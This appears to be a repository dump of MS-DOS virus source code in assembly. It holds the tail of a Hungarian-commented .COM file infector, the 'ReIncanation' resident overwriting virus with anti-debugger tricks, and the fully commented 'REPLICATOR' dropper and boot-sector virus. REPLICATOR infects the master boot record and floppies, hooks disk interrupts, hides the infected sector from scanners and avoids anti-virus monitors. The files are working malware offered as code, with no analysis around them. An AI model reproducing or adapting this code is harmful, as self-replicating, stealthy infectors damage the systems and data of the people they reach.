INT 21H ; BEOLVASNI
JC INDJ ; HIBA TORTENT
CMP AX,3 ; MIND A HAROM BYTEOT BEOLVASTA?
JNZ INDJ ; NEM, HIBA VOLT
MOV AX,4202H ; MUTATO A FILE VEGERE
MOV CX,0
MOV DX,0
INT 21H
JC INDJ ; TORTENT HIBA?
MOV CX,AX ; A FILE HOSSZA
SUB AX,3 ; MINUSZ 3, EZ LESZ AZ UJ INDITASI CIM
MOV [SI+UJKEZ-TABL+1],AX
ADD CX,OFFSET TABL+100H ; A TABLAZAT KEZDOCIME AZ UJ VIRUSBAN
MOV DI,SI ; A TABLAZAT KEZDETE
SUB DI,OFFSET TABL-TBLC-1
MOV [DI],CX ; A MOV DX, UTASITAS PARAMETERE
MOV AH,40H ; KIIRAS A FILE-BA
MOV CX,OFFSET HOSSZ ; A VIRUS HOSSZA
MOV DX,SI ; A TABLAZAT KEZDOCIME
SUB DX,OFFSET TABL ; MINUSZ A VIRUSTORZS HOSSZA
INT 21H ; KIIRAS
JC INDJ ; HIBA TORTENT
CMP AX,OFFSET HOSSZ ; MINDEN BYTEOT KIIRT?
JNZ INDJ ; NEM
MOV AX,4200H ; MUTATO A FILE ELEJERE
MOV CX,0
MOV DX,0
INT 21H
JC INDJ ; HIBA TORTENT?
MOV AH,40H ; KIIRAS A FILE-BA
MOV CX,3 ; AZ ELSO 3 BYTE KIIRASA
MOV DX,SI
ADD DX,OFFSET UJKEZ-TABL
INT 21H ; KIIRAS
INDJ: MOV DX,[SI+FILDAT-TABL]
MOV CX,[SI+FILIDO-TABL]
DB 81H,0E1H,0E0H,0FFH ; AND CX,0FFE0H
OR CX,OFFSET 11111B ; AZ IDO 62 MASODPERC
MOV AX,5701H ; A KELETKEZESI DATUM ES IDO VISSZAIRASA
INT 21H ; ES A FERTOZES JELZESE
MOV AH,3EH ; FILE LEZARASA
INT 21H
INDK: MOV AX,4301H ; A REGI ATTRIBUTUM VISSZAALLITASA
MOV CX,[SI+FILATT-TABL]
MOV DX,FSPEC-TABL
ADD DX,SI ; A FILE SPECIFIKACIO CIME
INT 21H
IND7: PUSH DS ; DS ELMENTESE
MOV AH,1AH ; A DTA REGI CIMENEK BEALLITASA
MOV DX,WORD PTR [SI+DTACIM-TABL]
MOV DS,WORD PTR [SI+DTACIM-TABL+2]
INT 21H
POP DS ; DS VISSZAALLITASA
IND2: POP CX
XOR AX,AX ; AX=0
XOR BX,BX ; BX=0
XOR DX,DX ; DX=0
XOR SI,SI ; SI=0
MOV DI,100H ; 100H A VEREMBE
PUSH DI
XOR DI,DI ; DI=0
RET 0FFFFH
TABL EQU $
DTACIM DD 0
FILIDO DW 0
FILDAT DW 0
FILATT DW 0
FILKEZ DB 0,0,0
UJKEZ DB 0,0,0
FKER DB '*.COM',0
UTCIM DW 0
FAKT DW 0
SZOVEG DB 'PATH='
FSPEC DB 40H DUP(' ')
UJDTA DB 2BH DUP(0)
RESET DB 0EAH,0F0H,0FFH,0,0F0H
VEG EQU $
VIRUS ENDS
END
MSDOS/R-Index/Virus.MSDOS.Unknown.regdisp.asm
BIN
View File
Binary file not shown.
MSDOS/R-Index/Virus.MSDOS.Unknown.reincanation.asm
+147
View File
@@ -0,0 +1,147 @@
start:
and al,21h
;anti_disassembler & anti_debugger
mov cx,09ebh
mov ax,0fe05h
jmp $-2
add ah,03bh
jmp $-10
;anti_debugger
mov ax,3503h ;save int 3h in bx
int 21h ;do it
mov ah,25h ;set new int 3h...
mov dx,offset new_int_3 ;...to new_int_3
int 21h ;do it
xchg bx,dx ;exchange bx,dx (restore original int 3h)
int 21h ;do it
;anti_vsafe
mov ax,0f9f2h
add ax,10h
mov dx,5935h
add dx,10h
mov bl,10h
sub bl,10h
int 16h
mov ah,9h ;write string
mov dx,offset file_not_found ;Befehl oder Dateiname nicht gefunden.
int 21h ;do it
mov ax,9999h ;put 9999h in ax (for resident test)
int 21h ;do it
cmp bx,9999h ;compare bx,9999h
je already_there ;if bx=9999h, we are already resident and goto already_there
jmp makemegotsr ;else goto makemegotsr
already_there: ;already resident
int 20h ;exit
makemegotsr:
mov ax,3521h ; get int 21h
int 21h ;do it
mov word ptr cs:old21,bx ; save old int 21h
mov word ptr cs:old21+2,es ;... save
mov dx,offset new21 ; new int 21 comes to offset new21
mov ax,2521h ; set new int 21h
int 21h ; do it
push cs ; push it
pop ds ; pop it
mov dx,offset endvir ; put everything of us in memory
int 27h ; do it
new21: pushf ;new int 21
cmp ax,9999h ;resident test ???
jnz no_installation_check ;if no test goto no_install_check
xchg ax,bx ;if resident test, put 9999h in bx
no_installation_check: ;no_install_check
cmp ax,4b00h ;is there something executed?
jz infect ;yes, goto infect
jmp short end21 ;no, jmp to normal old int 21h
infect: ;infect the executed file
mov ax,4301h ;set attributes
xor cx,cx ;to 0
int 21h ;do it
mov ax,3d02h ;open file
int 21h ;do it
mov bx,ax ;put ax in bx, or.. xchg ax,bx.. but that doesn't work here
push ax ;push all
push bx
push cx
push dx
push ds
push cs
pop ds
mov ax,4200h ;seek
xor cx,cx ;at beginning of tha file
cwd
int 21h ;do it
mov cx,offset endvir-offset start ;how much bytes to write
mov ah,40h ;write
mov dx,offset start ;from offset start
int 21h ;do it
cwd ; set date/time
xor cx,cx ; to zero
mov ax,5701h ;function for date/time
int 21h ;do it
mov ah,3eh ; close file
int 21h ;do it
mov ah,2ah ;get date
int 21h ;do it
cmp dh,4 ;compare month(dh) with 4
jne not_my_birthday ;not the 4th month, goto not_my_birthday
monat_ok:cmp dl,21 ;else compare day(dl) with 21
jne not_my_birthday ;not the 21th, goto not_my_birthday
tag_ok:mov ah,9h ;if it is the 21.April write message
mov dx,offset text ;of offset text
int 21h ;do it
mov ah,00h ;wait until keypressed
int 16h ;do it
jmp restore ;goto restore (tha registers)
not_my_birthday: ;if it is not_my_birthday
mov ah,9h ;write message
mov dx,offset file_not_found ;Befehl oder Dateiname nicht gefunden. (English: Bad command or filename.)
int 21h ;do it
restore:
pop ds ; pop all
pop dx
pop cx
pop bx
pop ax
end21: popf ; pop far
db 0eah ; jmp far (?)
old21 dw 0,0 ; where to store the old INT21
text: db'ReIncanation written by Spooky. Austria 1996',0dh,0ah,'$' ;message for debugger or date 21.April
file_not_found: db'Befehl oder Dateiname nicht gefunden.',0dh,0ah,'$' ;message file not found
new_int_3: ;new interrupt 3h for the debugger
mov ah,9h ;write string to standard output
mov dx,offset text ;text to write
int 21h ;do it
mov ah,00h ;wait until keypressed
int 16h ;do it
int 20h ;-> terminate debugging
endvir label byte ; End of file
end start
MSDOS/R-Index/Virus.MSDOS.Unknown.replic_d.asm
+717
View File
@@ -0,0 +1,717 @@
;**********************************************************************************************
;* *
;* FILE: DROP_REP.ASM (c) 1993 *
;* PURPOSE: Dropper containing REPLICATOR boot sector virus *
;* AUTHOR: Willoughby DATE: 04/19/93 *
;* *
;**********************************************************************************************
;
;------------------------------------------ EQUATES -------------------------------------------
;
AT_TAG EQU 0FC
BAD_TAG EQU 0BAD
BIOS13_OFFSET EQU 004C
BIOS13_SEGMENT EQU 004E
BIOS40_SEGMENT EQU 0103
BPB_NUM_SECT EQU 013
CLEAR EQU 00
INF_TAG1 EQU 0ABCD
INF_TAG2 EQU 0CDEF
MEM_SIZE EQU 0413
MOTOR_ON EQU 043F
PARTITION_OFFSET EQU 01BE
ROM_SEGMENT EQU 0F0
SET EQU 0BB
SYS_ID_OFFSET EQU 0FFFE
SYS_ID_SEGMENT EQU 0F000
;
;---------------------------------------- MAIN PROGRAM ----------------------------------------
;
CODE SEGMENT
;
;----------------------------
;Dropper for REPLICATOR virus
;----------------------------
;
DROPPER:
;
;Check system type to determine if the INT1Ah read-real-time-clock function is supported (AT
;or better). If not, skip the trigger date check/storage process and store "BAD" tag for
;the benefit of the REPLICATOR infection analysis program (a future release).
;
MOV AX,SYS_ID_SEGMENT
MOV DS,AX ;Set DS to ROM segment.
CMP B[SYS_ID_OFFSET],AT_TAG ;Check system ID byte for AT system tag.
PUSH CS
POP DS ;Set DS to dropper code segment.
JE >D1 ;If AT, check date and store before infection.
MOV DROP_MODAY,BAD_TAG ;If not, store hard drive drop date "BAD" tag
;in VIRUS_DIR.
JMP >D3 ;Then continue infection process.
;
;Determine if date is equal to or greater than preselected infection date. This allows the
;dropper program to pass initial anti-viral scanning/activity monitoring by remaining dormant
;until a later date. Also, store month, day and year of pending fixed disk infection in
;VIRUS_DIR.
;
D1:
MOV AH,04 ;Set read-date function.
INT 01A ;BIOS read-clock interrupt.
MOV DROP_YEAR,CX ;Store infection year in VIRUS_DIR.
MOV DROP_MODAY,DX ;Store month and day in VIRUS_DIR.
CMP CX,01993 ;Compare system year with 1993 trigger year
;(CH=century, CL=year, both in BCD).
JA >D2 ;If year>trigger year, proceed w/infection.
JB >D5 ;If year<trigger year, exit and do not infect.
CMP DX,0101 ;Compare system date w/Jan. 1st (DH=month,
;DL=day, both in BCD). The date Jan. 1
;effectively disables this function.
JB >D5 ;If the current date is not => the trigger
;date, don't infect.
;
;Store time of pending fixed disk infection in VIRUS_DIR.
;
D2:
MOV AH,02 ;Select read-time function.
INT 01A ;BIOS read-clock interrupt.
MOV DROP_TIME,CX ;Store infection hour and minute in VIRUS_DIR.
;
;Determine if an anti-viral program is monitoring viral activity via INT40h. If so, don't
;infect.
;
D3:
PUSH DS ;Preserve DS.
XOR AX,AX
MOV DS,AX ;Zero DS to point to BIOS data table.
CMP B[BIOS40_SEGMENT],ROM_SEGMENT ;Has INT40h been stolen from BIOS ROM by an
;anti-virus program?
POP DS ;Restore DS.
JB >D5 ;If INT40h has been stolen, do not attempt
;infection.
;
;Load MBR.
;
PUSH CS
POP ES ;Set ES to dropper code segment.
MOV AX,0201 ;Select read-1-sector function.
MOV BX,MBR_BUFFER ;Set disk I/O buffer offset.
MOV CX,0001 ;Track 0, sector 1.
MOV DX,0080 ;Head 0, fixed disk 1.
INT 013 ;Read MBR.
JB >D5 ;Exit if flag=failure.
;
;Check MBR for infection.
;
CMP W[BX+OFFSET INFECT_TAG1-0200],INF_TAG1 ;Check for VIRUS_BOOT infection tag.
JE >D5 ;If infected then exit.
;
;Check fixed disk for an unused first track (head 0, cylinder 0) to avoid damaging any FAT
;which might be present in that area. This is accomplished by checking the partition table
;value which holds the number of the starting head of the first partition. If this number is
;equal to or greater than 01, the first track is not in use.
;
CMP B[BX+PARTITION_OFFSET+1],01 ;Check for unused track on fixed disk by
;checking partition table data.
JB >D5 ;If in use, exit to avoid damage to FAT.
;
;Increment hard disk infection counter for pending infection.
;
INC W[OFFSET HARD_COUNT]
;
;Write original MBR to its new location. Also, determine if VIRUS_DIR is present on the fixed
;disk. If so, don't write VIRUS_DIR to disk so that the previous infection counts and dates
;are retained.
;
MOV AX,0201 ;Select read-1-sector function.
MOV BX,MBR_BUFFER+0200 ;Set disk I/O buffer offset.
MOV CL,09 ;Track 0, sector 9.
INT 013 ;Read VIRUS_DIR sector.
JB >D5 ;Exit if flag=failure.
CMP W[BX+OFFSET INFECT_TAG2-0400],INF_TAG2 ;Check for VIRUS_DIR infection tag.
MOV AX,0302 ;Select write-2-sectors function.
MOV BX,VIRUS_DIR ;Specify VIRUS_DIR buffer offset.
JNE >D4 ;If VIRUS_DIR is not present, write
;both VIRUS_DIR and MBR.
MOV AX,0301 ;If present, select write-1-sector
;function.
MOV BX,MBR_BUFFER ;Specify MBR buffer address.
MOV CL,0A ;Specify relocation sector for MBR.
D4:
INT 013 ;Write to specified sector(s).
JB >D5 ;Exit if flag=failure.
;
;Copy partition table data to virus.
;
MOV SI,MBR_BUFFER+PARTITION_OFFSET ;Set source offset.
MOV DI,VIRUS_BOOT+PARTITION_OFFSET ;Set destination offset.
MOV CL,021 ;Set repetition count (number of words) for
;partition table move.
CLD ;Clear direction flag (fwd).
REP MOVSW ;Move partition table to virus.
;
;Write virus to MBR.
;
MOV AX,0301 ;Select write-1-sector function.
MOV BX,VIRUS_BOOT ;Set disk I/O buffer offset.
MOV CL,01 ;Track 0, sector 1.
INT 013 ;Write virus with attached partition table
;to MBR.
;
;Terminate dropper.
;
D5:
MOV AX,04C00 ;Select terminate w/return code function.
INT 021 ;Terminate dropper.
;
DB 86 DUP 00 ;Pad bytes to avoid possible DMA I/O errors.
;
;**********************************************************************************************
;* *
;* REPLICATOR boot sector virus *
;* *
;**********************************************************************************************
;
VIRUS_BOOT:
;
JMP >B1 ;Jump over BPB data to virus entry point.
;
BPB_START:
;
DB 60 DUP 00 ;Reserve space for diskette BPB data.
;
BPB_END:
;
;------------
;Boot routine
;------------
;
;Set location of stack.
;
B1:
XOR AX,AX ;Zero AX.
MOV DS,AX ;Zero DS.
CLI ;Disable interrupts.
MOV SS,AX ;Zero SS.
MOV AX,07C00 ;Load location of stack to AX.
MOV SP,AX ;Set SP=7C00h.
STI ;Enable interrupts.
PUSH DS ;Store return address of boot record to be
PUSH AX ;popped from the stack when VIRUS_BOOT
;returns to it (0000:7C00h).
;
;Read INT13h segment and offset from BIOS data table and store within VIRUS_BOOT.
;
MOV AX,W[BIOS13_OFFSET] ;Load BIOS INT13h vector offset stored at
;0000:004Ch.
MOV W[OFFSET BIOS_OFFSET+07A00],AX ;Store BIOS INT13h offset value in virus data
;area.
MOV CL,06 ;Set CL for virus segment shift. Location of
;this operation chosen to defeat anti-viral
;generic code-segment scans.
MOV AX,W[BIOS13_SEGMENT] ;Load BIOS INT13h vector segment stored at
;0000:004Eh.
MOV W[OFFSET BIOS_SEGMENT+07A00],AX ;Store BIOS INT13h segment value in virus data
;area.
;
;Calculate virus upper memory segment value and store within VIRUS_BOOT.
;
MOV BX,MEM_SIZE ;Load BX with address 0413h. This defeats
;anti-viral searches for 0413h MOV operations.
MOV AX,W[BX] ;Load memory size (in KB) stored at 0000:0413h.
DEC AX ;Calculate value for 2KB reduction of
DEC AX ;conventional memory.
SHL AX,CL ;Calculate virus segment.
MOV W[OFFSET REENTRY_SEGMENT+07A00],AX ;Store virus segment value in virus data area.
MOV ES,AX ;Store in ES to be used to move virus to top of
;conventional memory.
;
;Move VIRUS_BOOT from 0000:7C00h to top of memory - 2KB.
;
MOV SI,07C00 ;Set source offset address for virus move.
XOR DI,DI ;Set destination offset address to 0000h.
MOV CX,0100 ;Set repetition count (number of words) for
;move.
CLD ;Clear direction flag (fwd).
REP MOVSW ;Move virus from DS:7C00h to ES:0000h.
CS JMP D[OFFSET REENTRY_OFFSET+07A00] ;Jump to self in new location via stored
;address.
;
;Load VIRUS_DIR and original boot sector/MBR to top of memory - 1.5KB.
;
NEW_LOCATION:
;
PUSH CS
POP DS ;Set DS=CS.
MOV AX,0202 ;Select read-2-sectors function.
MOV BX,0200 ;Set disk I/O buffer offset.
MOV CL,B[OFFSET SECTOR-0200] ;VIRUS_DIR sector determined by value stored in
;VIRUS_BOOT.
CMP CL,09 ;Test for hard drive (HD) boot.
JE >B2 ;Yes, booted from HD.
INC DH ;Select head 1, floppy drive DL.
B2:
INT 013 ;Read VIRUS_DIR and original boot record.
JNB >B3 ;Continue if flag=success.
JMP B5 ;Exit if flag=failure.
;
;Copy original boot sector/MBR down to 0000:7C00h for later execution.
;
B3:
XOR AX,AX ;Zero AX.
MOV ES,AX ;Zero ES (destination segment value).
MOV SI,0400 ;Set source offset address for virus move.
MOV DI,07C00 ;Set destination offset address for move.
MOV CX,0100 ;Set repetition count (# of words) for move.
CLD ;Clear direction flag (fwd).
REP MOVSW ;Copy original boot record to 0000:7C00h.
;
;Determine if the virus is already installed on the system in the memory above. If it is, in
;order to prevent multiple installations of the virus in memory and the problems that this can
;cause, the virus will be removed from memory. This will be done by restoring the BIOS data
;table values that it has changed to their original, pre-infection values.
;
CMP W[OFFSET INFECT_TAG1+0600],INF_TAG1 ;Check for presence of virus above us.
JNE >B4 ;If it's not there, exit removal routine.
MOV AX,W[OFFSET BIOS_OFFSET+0600] ;Get the pre-infection INT13h offset value from
;the virus installed in memory.
PUSH AX ;Save that value on the stack.
MOV AX,W[OFFSET BIOS_SEGMENT+0600] ;Get the pre-infection INT13h segment value.
PUSH DS ;Preserve DS.
XOR BX,BX ;Zero BX.
MOV DS,BX ;Zero DS.
MOV W[BIOS13_SEGMENT],AX ;Restore BIOS data table to pre-infection
;segment value.
POP AX ;Pop pre-infection offset value from stack.
MOV W[BIOS13_OFFSET],AX ;Restore BIOS data table to pre-infection
;offset value.
MOV BX,MEM_SIZE ;Move data table address for conventional
;memory size into BX.
ADD W[BX],02 ;Increase memory size value by 2KB to restore
;it to pre-infection value.
POP DS ;Restore DS.
JMP >B5 ;Exit without installing virus in memory.
;
;Test for HD boot and, if true, install virus in memory.
;
B4:
CMP DL,080 ;Booted from HD?
JE >B6 ;If so, install virus and exit.
;
;Must be booting from floppy, so load MBR to top of memory - 1KB.
;
PUSH CS
POP ES ;Set ES=CS.
MOV AX,0201 ;Select read-1-sector function.
MOV BX,0400 ;Set disk I/O buffer offset.
MOV CL,01 ;Track 0, sector 1.
MOV DX,0080 ;Head 0, HD 1.
INT 013 ;Read MBR.
JB >B5 ;Exit if flag=failure and do not steal INT13h.
;
;Check MBR for infection.
;
CMP W[BX+OFFSET INFECT_TAG1-0200],INF_TAG1 ;Check MBR for infection tag.
JE >B5 ;If infected, exit and do not steal INT13h.
;
;Check fixed disk for an unused first track (head 0, cylinder 0) to avoid damaging any FAT
;which might be present in that area.
;
CMP B[BX+PARTITION_OFFSET+1],01 ;Check for unused track on HD by checking
;partition table data (start head => 1).
JB >B5 ;If first track is in use, exit to avoid
;FAT damage and do not steal INT13h vector.
;
;Increment hard disk infection counter for pending infection.
;
INC W[OFFSET HARD_COUNT-0200]
;
;Write VIRUS_DIR and original MBR to fixed disk sectors 09h and 0Ah respectively.
;
MOV AX,0302 ;Select write-2-sectors function.
MOV BX,0200 ;Set disk I/O buffer offset.
MOV CL,09 ;Track 0, sector 9.
MOV B[OFFSET SECTOR-0200],CL ;Store destination sector number in VIRUS_BOOT.
INT 013 ;Move VIRUS_DIR to sector 09h and original MBR
;to sector 0Ah.
JB >B5 ;Exit if flag=failure and do not steal INT13h.
;
;Copy partition table data to VIRUS_BOOT.
;
MOV SI,PARTITION_OFFSET+0400 ;Set source offset.
MOV DI,PARTITION_OFFSET ;Set destination offset.
MOV CL,021 ;Set repetition count (# of words) move.
CLD ;Clear direction flag (fwd).
REP MOVSW ;Move partition table to virus.
;
;Write VIRUS_BOOT to MBR and exit without installing virus in memory. Subsequent HD boot will
;do this.
;
MOV AX,0301 ;Select write-1-sector function.
XOR BX,BX ;Set disk I/O buffer offset.
MOV CL,01 ;Track 0, sector 1.
INT 013 ;Write virus w/attached partition table to MBR.
B5:
XOR DX,DX ;Restore DX back to value at floppy boot
;(head 0, drive 0).
RETF ;Exit, do not steal INT13h or reduce mem. size.
;Return to boot sector code at 0000:7C00h.
;
;Steal BIOS INT13h vector and reduce memory size to install virus as TSR.
;
B6:
MOV BX,W[OFFSET REENTRY_SEGMENT-0200] ;Load VIRUS_DIR segment value to BX.
XOR AX,AX ;Zero AX.
MOV DS,AX ;Zero DS.
MOV W[BIOS13_SEGMENT],BX ;Point INT13h vector to VIRUS_DIR
;segment.
MOV W[BIOS13_OFFSET],OFFSET VIRUS_INT-0200 ;Point INT13h vector to VIRUS_INT
;INT13h handler offset in VIRUS_DIR.
MOV BX,MEM_SIZE ;Load BIOS data table address for
;memory size to BX.
SUB W[BX],02 ;Reduce memory by 2KB to protect virus
;area from being overwritten by other
;programs.
RETF ;Return to boot sector code at
;0000:7C00h.
;
;Reserve storage locations for virus data and preset some known values.
;
BIOS_OFFSET DW ? ;BIOS INT13 offset.
BIOS_SEGMENT DW ? ;BIOS INT13 segment.
REENTRY_OFFSET DW NEW_LOCATION-0200 ;Virus reentry offset.
REENTRY_SEGMENT DW ? ;Virus reentry segment.
INFECT_TAG1 DW INF_TAG1 ;Infection tag for VIRUS_BOOT.
SECTOR DB 09 ;Sector # containing VIRUS_DIR.
;
VIRUS_BOOT_END:
;
;Reserve end-of-sector text area and establish valid boot record tag.
;
DB 195 DUP 00 ;End-of-sector pad bytes.
DB 055,0AA ;Boot record tag.
;
SECTOR_END:
;
;End of boot sector/MBR viral code.
;----------------------------------------------------------------------------------------------
;Start of directory sector viral code.
;
VIRUS_DIR:
;
;Create four empty root directory entries at the beginning of the sector.
;
DB 128 DUP 00
;
;--------------
;INT13h Handler
;--------------
;
VIRUS_INT:
;
CMP DL,080 ;Hard drive I/O?
JNE >F1 ;No, exit to floppy test routine.
;
;Stealth routine to return original, uninfected MBR to any anti-viral scan program. Also,
;prevents writes to the MBR to prevent disinfection of the fixed disk while the virus is
;active in memory.
;
CMP CX,0001 ;Track 0, sector 1?
JNE >U1 ;If not, no need for the stealth routine.
;Instead, jump to infect. count. update.
CMP DH,00 ;Head 0?
JNE >E2 ;If not, exit stealth routine.
CMP AH,03 ;Write sector?
JE >S1 ;Yes, simulate I/O.
PUSH CX ;Preserve CX (track/sector #).
MOV CL,0A ;Redirect I/O to sector 0Ah, the new location
;of the original MBR.
PUSHF
CS CALL D[OFFSET BIOS_OFFSET-0200] ;Send scan program original MBR
;instead of infected MBR.
POP CX ;Restore original track/sector value requested
;the calling routine. Anti-viral scanner will
;monitor the contents of CL upon return.
S1:
XOR AH,AH ;Zero AH to simulate return value of
;successful I/O.
CLC ;Clear carry flag to simulate successful I/O
;to calling routine.
RETF 2 ;Return to calling routine.
;
;Infection counter update routine writes VIRUS_DIR containing the lastest floppy infection
;counter value to the hard drive only if there has been a diskette infection since the last
;hard drive access.
;
U1:
PUSH DS ;Preserve DS.
PUSH CS
POP DS ;Set DS=CS
CMP B[OFFSET UPDATE_FLAG-0200],SET ;Floppy infected since last HD access?
JNE >U2 ;No, exit counter update routine.
MOV B[OFFSET UPDATE_FLAG-0200],CLEAR ;Yes, clear floppy infect flag.
PUSH ES ;Preserve ES.
PUSH CS
POP ES ;Set ES=CS
PUSH AX ;Preserve registers.
PUSH BX
PUSH CX
PUSH DX
MOV AX,0301 ;Select write-1-sector function.
MOV BX,0200 ;Set disk I/O buffer start address.
MOV CX,0009 ;Specify track 0, sector 9.
MOV DH,00 ;Specify head 0.
PUSHF
CS CALL D[OFFSET BIOS_OFFSET-0200] ;Save VIRUS_DIR w/new infect. count to HD.
POP DX ;Restore registers
POP CX
POP BX
POP AX
POP ES
U2:
POP DS
JMP >E2 ;Exit to handler exit.
;
;Check the INT13h register values for drive A or B read or write request. This prevents
;problems caused by the virus infecting a diskette during format. Also, by limiting infection
;attempts to the first two floppy drives, it avoids the problems it would cause to a tape
;backup system emulating a third or fourth floppy drive.
;
F1:
PUSH DS ;Preserve DS.
PUSH AX ;Preserve AX.
CMP DL,01 ;Floppy I/O (A or B)?
JA >E1 ;No, don't infect.
CMP AH,02 ;Check for read function.
JB >E1 ;Exit if below read function.
CMP AH,03 ;Check for write function.
JA >E1 ;Exit if above write function.
;
;Check diskette motor status to limit infection attempt to first INT13h call thereby preventing
;suspicious floppy drive noises.
;
XOR AX,AX ;Zero AX.
MOV DS,AX ;Zero DS.
MOV AL,DL ;Move motor-on test bit into AL.
INC AL ;Position bit for floppy 'DL'.
TEST B[MOTOR_ON],AL ;Test for floppy motor on.
JNE >E1 ;Yes, don't infect.
;
;Check for presence of TSR anti-viral monitoring program to avoid detection of boot sector
;write by virus. If present, don't attempt infection.
;
CMP B[BIOS40_SEGMENT],ROM_SEGMENT ;Has INT40h been stolen from BIOS ROM by an
;anti-virus program?
JB >E1 ;If so, do not attempt infection.
;
;Infect floppy.
;
POP AX ;Restore AX.
POP DS ;Restore DS.
PUSHF
CS CALL D[OFFSET BIOS_OFFSET-0200] ;Give calling routine what it wants.
PUSHF ;Preserve flags.
CALL >F2 ;Then attempt infection.
POPF ;Restore flags to hide I/O errors.
RETF 2 ;Return to calling routine.
;
;Jump to BIOS.
;
E1:
POP AX ;Restore AX.
POP DS ;Restore DS.
E2:
CS JMP D[OFFSET BIOS_OFFSET-0200] ;Jump through BIOS to calling routine.
;
;Diskette infection routine.
;
F2:
PUSH AX ;Preserve all registers.
PUSH BX
PUSH CX
PUSH DX
PUSH DS
PUSH ES
PUSH SI
PUSH DI
;
;Check system type to determine if the INT1Ah read-real-time-clock function is supported (AT
;or better). If not, skip the date check/storage process and store floppy infection "BAD"
;date tag in VIRUS_DIR.
;
MOV AX,SYS_ID_SEGMENT
MOV DS,AX ;Set DS to ROM offset.
CMP B[SYS_ID_OFFSET],AT_TAG ;Check system ID byte for AT system tag.
PUSH CS
POP DS ;Set DS to point to dropper segment.
JE >F3 ;If AT, check date and store before infection.
MOV W[OFFSET FLOPPY_MODAY-0200],BAD_TAG ;Store date "BAD" tag in VIRUS_DIR.
JMP >F4 ;Then continue infection process.
;
;Store month, day and year of pending floppy diskette infection in VIRUS_DIR.
;
F3:
PUSH DX
MOV AH,04 ;Set read-date function.
INT 01A ;BIOS read-clock interrupt.
MOV W[OFFSET FLOPPY_YEAR-0200],CX ;Store infection year in VIRUS_DIR.
MOV W[OFFSET FLOPPY_MODAY-0200],DX ;Store month and day in VIRUS_DIR.
;
;Store time of pending floppy diskette infection in VIRUS_DIR.
;
MOV AH,02 ;Select read-time function.
INT 01A ;BIOS read-clock interrupt.
MOV W[OFFSET FLOPPY_TIME-0200],CX ;Store infection hour and minute in VIRUS_DIR.
POP DX
;
;Load diskette boot sector to top of memory - 1KB.
;
F4:
PUSH CS
POP ES ;Set ES=CS.
MOV AX,0201 ;Select read-1-sector function.
MOV BX,0400 ;Set disk I/O buffer offset.
MOV CX,0001 ;Track 0, sector 1.
MOV DH,00 ;Head 0, drive DL.
PUSHF
CALL D[OFFSET BIOS_OFFSET-0200] ;Read drive DL boot sector to buffer by
;calling INT13h routine in BIOS ROM.
JNB >F5 ;Proceed with infection if flag=success.
JMP F7 ;Otherwise, exit.
;
;Check diskette boot sector for infection.
;
F5:
CMP W[BX+OFFSET INFECT_TAG1-0200],INF_TAG1 ;Check for VIRUS_BOOT infection tag.
JE >F7 ;If infected, then exit.
;
;Determine diskette type from BPB data to allow VIRUS_DIR and original boot sector to be
;written to the last two root directory sectors. This maximizes the number of files that can
;be stored on the diskette after infection. Also, detect non-standard formats and do not
;infect to prevent damage.
;
MOV CL,02 ;VIRUS_DIR sector for 360K.
MOV AX,W[BX+BPB_NUM_SECT] ;Load # sect. on floppy from BPB.
CMP AX,02D0 ;Check for # sectors on 360K.
JE >F6 ;Exit if 360K floppy.
MOV CL,04 ;VIRUS_DIR sector for 720K.
CMP AX,05A0 ;Check for # sectors on 720K.
JE >F6 ;Exit if 720K floppy.
MOV CL,0D ;VIRUS_DIR sector for 1.2M.
CMP AX,0960 ;Check for # sectors on 1.2M.
JE >F6 ;Exit if 1.2M floppy.
MOV CL,0E ;VIRUS_DIR sector for 1.44M.
CMP AX,0B40 ;Check for # sectors on 1.44M.
JE >F6 ;Exit if 1.44M floppy.
JMP >F7 ;Non-standard disk format, exit to avoid
;damage.
;
;Load the first of the two root directory sectors that will be used to store the VIRUS_DIR
;and original boot sector to top of memory - 0.5KB.
;
F6:
MOV B[OFFSET SECTOR-0200],CL ;Store destination sector # in VIRUS_BOOT.
MOV AX,0201 ;Select read sector function.
MOV BX,0600 ;Set disk I/O buffer offset.
INC DH ;Head 1, drive DL.
PUSHF
CALL D[OFFSET BIOS_OFFSET-0200] ;Load destination sector.
JB >F7 ;Exit if flag=failure.
;
;Confirm that the directory sector chosen to be the future location of VIRUS_DIR is empty
;before attempting infection. This prevents the loss of files which would result from
;the overwriting of root directory entries by the virus.
;
CMP B[BX],00 ;Empty root directory entry?
JNE >F7 ;No, so exit and don't infect disk.
;
;Copy the original boot sector's BPB to VIRUS_BOOT to allow functional infection of any
;diskette type.
;
MOV SI,BPB_START+0200 ;Set source offset.
MOV DI,BPB_START-0200 ;Set destination offset.
MOV CL,BPB_END-BPB_START ;Set repetition count (# of bytes) for move.
CLD ;Clear direction flag (fwd).
REP MOVSB ;Move BPB to virus to allow functional
;infection of any diskette format.
;
;Copy original boot sector end-of-sector text to VIRUS_BOOT to prevent easily visible changes
;to boot sector.
;
MOV SI,VIRUS_BOOT_END+0200 ;Set source offset.
MOV DI,VIRUS_BOOT_END-0200 ;Set destination offset.
MOV CL,SECTOR_END-VIRUS_BOOT_END ;Set repetition count (number of bytes) for
;text move.
CLD ;Clear direction flag (fwd).
REP MOVSB ;Move end-of-sector text to virus to prevent
;easily visible change to boot sector.
;
;Write VIRUS_BOOT to diskette boot sector.
;
MOV AX,0301 ;Select write-1-sector function.
XOR BX,BX ;Set disk I/O buffer offset.
MOV CL,01 ;Track 0, sector 1.
DEC DH ;Head 0, drive DL.
PUSHF
CALL D[OFFSET BIOS_OFFSET-0200] ;Write infected boot sector.
JB >F7 ;Exit if flag=failure.
;
;Increment floppy infection count.
;
INC W[OFFSET FLOPPY_COUNT-0200]
;
;Clear diskette infection flag.
;
MOV B[OFFSET UPDATE_FLAG-0200],CLEAR
;
;Write VIRUS_DIR and original boot sector to appropriate sectors.
;
MOV AX,0302 ;Select write-2-sectors function.
MOV BX,0200 ;Set disk I/O buffer offset.
MOV CL,B[OFFSET SECTOR-0200] ;Track 0, sector stored at 0189h.
INC DH ;Head 1, drive DL.
PUSHF
CALL D[OFFSET BIOS_OFFSET-0200] ;Relocate boot sector.
;
;Set diskette infection flag.
;
MOV B[OFFSET UPDATE_FLAG-0200],SET
;
;Exit diskette infection routine.
;
F7:
POP DI ;Restore all registers.
POP SI
POP ES
POP DS
POP DX
POP CX
POP BX
POP AX
RET ;Return to infection routine exit.
;
;Virus data area.
;
HARD_COUNT DW ? ;Number of HD infections since drop.
DROP_MODAY DW ? ;Month and day of HD drop.
DROP_YEAR DW ? ;Year of HD drop.
DROP_TIME DW ? ;Time of HD drop.
